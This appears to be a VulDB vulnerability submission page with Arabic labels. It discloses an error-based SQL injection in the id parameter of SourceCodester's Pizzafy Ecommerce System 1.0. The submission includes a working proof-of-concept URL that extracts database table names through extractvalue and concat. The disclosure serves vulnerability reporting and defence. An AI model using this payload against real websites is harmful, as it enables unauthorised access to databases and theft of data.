| عنوان | SourceCodester Pizzafy Ecommerce System 1.0 SQL Injection |
|---|
| الوصف | Title: Pizzafy Ecommerce System 1.0
Vulnerability Type: SQL Injection (Based Error)
Severity: HIGH
Status: Unpatched
Description:
A Error-based SQL Injection vulnerability was discovered in the SELECT functionality of the Pizzafy Ecommerce System. This vulnerability occurs because the id parameter is not properly sanitized, allowing an attacker to inject malicious SQL commands into the backend database query.
Affected Version: 1.0
Endpoint or parameter vulnerable:
pizza/index.php?page=category&id=1
PoC:
http://localhost/pizza/index.php?page=category&id=1%20AND%20extractvalue(1,%20concat(0x7e,%20(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=database()%20LIMIT%200,1)))%20--
References:
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html |
|---|
| المصدر | ⚠️ https://github.com/fernando-mengali/vulndb-submissions/blob/main/07-vul-SQLI.md |
|---|
| المستخدم | Fernando Mengali (UID 83791) |
|---|
| ارسال | 10/04/2026 09:08 PM (2 أشهر منذ) |
|---|
| الاعتدال | 28/04/2026 07:23 AM (17 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 359916 [SourceCodester Pizzafy Ecommerce System 1.0 index.php?page=category معرف حقن SQL] |
|---|
| النقاط | 20 |
|---|